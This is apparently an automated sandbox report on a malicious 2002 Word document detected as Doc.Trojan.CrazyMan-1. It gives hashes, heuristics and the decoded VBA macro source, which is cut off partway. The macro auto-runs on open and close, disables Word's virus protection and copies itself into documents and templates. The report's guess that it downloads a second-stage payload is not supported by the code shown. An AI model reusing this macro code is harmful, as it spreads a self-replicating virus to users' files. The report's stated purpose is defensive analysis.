Office (OLE) malware analysis — malicious · f1c46e52db66d53f

MALICIOUS

Office (OLE)

36.5 KB Created: 2002-12-10 05:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 9b7ed81ca4805c49cf2afebfb511d4a2 SHA-1: f6a3ace88ba5bd79084ca1bcc10cdd801343e8e3 SHA-256: f1c46e52db66d53f6fb93fa8c7f7daf274d4526c819cdee83258683405707a1a

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a VBA macro that triggers on AutoOpen and Auto_Close events. The macro code appears to be designed to interact with Windows GDI and User32 libraries, suggesting an attempt to execute arbitrary code. This is further supported by ClamAV detecting it as 'Doc.Trojan.CrazyMan-1'. The macro's intent is likely to download and execute a second-stage payload.

Heuristics 5

ClamAV: Doc.Trojan.CrazyMan-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.CrazyMan-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4523 bytes
SHA-256: `0be9aa8bec6f6d8b4f3c04bb15b2385b98fbe9199405f7c5124be3c8cb66ff9c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1TemplateProject.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "LoveIris" Dim MainWindow As Long Dim MainWindowDC As Long Dim Pen As Long Dim Brush As Long Dim WindowsDir As String * 50 Dim ExitCommand As String Type LOGFONT lfHeight As Long lfWidth As Long lfEscapement As Long lfOrientation As Long lfWeight As Long lfItalic As Byte lfUnderline As Byte lfStrikeOut As Byte lfCharSet As Byte lfOutPrecision As Byte lfClipPrecision As Byte lfQuality As Byte lfPitchAndFamily As Byte lfFaceName(50) As Byte End Type Dim MyFont As LOGFONT Declare Function CreateFontIndirect Lib "gdi32" Alias "CreateFontIndirectA" (lpLogFont As LOGFONT) As Long Declare Function SetTextColor Lib "gdi32" (ByVal hdc As Long, ByVal crColor As Long) As Long Declare Function SetBkColor Lib "gdi32" (ByVal hdc As Long, ByVal crColor As Long) As Long Declare Function GetActiveWindow Lib "user32" () As Long Declare Function GetWindowDC Lib "user32" (ByVal hwnd As Long) As Long Declare Function Rectangle Lib "gdi32" (ByVal hdc As Long, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long Declare Function TextOut Lib "gdi32" Alias "TextOutA" (ByVal hdc As Long, ByVal x As Long, ByVal y As Long, ByVal lpString As String, ByVal nCount As Long) As Long Declare Function CreatePen Lib "gdi32" (ByVal nPenStyle As Long, ByVal nWidth As Long, ByVal crColor As Long) As Long Declare Function CreateSolidBrush Lib "gdi32" (ByVal crColor As Long) As Long Declare Function SelectObject Lib "gdi32" (ByVal hdc As Long, ByVal hObject As Long) As Long Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Sub AutoOpen() OutBreak End Sub Sub AutoClose() OutBreak End Sub Sub AutoNew() OutBreak End Sub Function InDocument() As Boolean Dim item InDocument = False For Each item In ActiveDocument.VBProject.VBComponents If item.Name = "LoveIris" Then InDocument = True Next End Function Function InTemplate() As Boolean Dim item InTemplate = False For Each item In NormalTemplate.VBProject.VBComponents If item.Name = "LoveIris" Then InTemplate = True Next End Function Sub DrawFont() With MyFont .lfHeight = 24 .lfWidth = 10 .lfEscapement = 0 .lfOrientation = 0 .lfWeight = 600 .lfItalic = 0 .lfUnderline = 0 .lfStrikeOut = 0 .lfCharSet = 1 .lfOutPrecision = 0 .lfClipPrecision = 0 .lfQuality = 0 .lfPitchAndFamily = 0 .lfFaceName(0) = &HCB .lfFaceName(1) = &HCE .lfFaceName(2) = &HCC .lfFaceName(3) = &HE5 .lfFaceName(4) = 0 End With MainWindow = GetActiveWindow() MainWindowDC = GetWindowDC(MainWindow) Brush = CreateSolidBrush(RGB(80, 80, 255)) Pen = CreatePen(0, 4, RGB(220, 80, 180)) SelectObject MainWindowDC, Pen SelectObject MainWindowDC, Brush Rectangle MainWindowDC, 100, 200, 440, 300 SelectObject MainWindowDC, CreateFontIndirect(MyFont) SetTextColor MainWindowDC, RGB(0, 255, 0) SetBkColor MainWindowDC, RGB(80, 80, 255) SetTextColor MainWindowDC, RGB(255, 255, 0) TextOut MainWindowDC, 120, 220, "Iris,算算我们相识多少天了？", 28 TextOut MainWindowDC, 300, 250, "永远爱你的W.L.", 14 End Sub Sub GoInIt() ActiveDocument.VBProject.VBComponents.Import ("c:\windows\w&i.386") ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End Sub Sub OutBreak() On Error Resume Next Options.VirusProtection = False Options.SaveNormalPrompt = False If Not InDocument() Then GoInIt End If With Application.FileSearch .NewSearch .LookIn = "C:\windows\" .SearchSubFolders = False .FileName = "w&i.386" .MatchTextExactly = False .FileType = msoFileTypeAllFiles If .Execute <= 0 Then ActiveDocument.VBProject.VBComponents("L ... (truncated)
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1035146424/Ole10Native	876 bytes
SHA-256: `871d87039e91162a0c91f040f6352e358eda568ef851b777cc79d04787cfcc2f`

Open this report in the interactive analyzer, or submit your own file for analysis.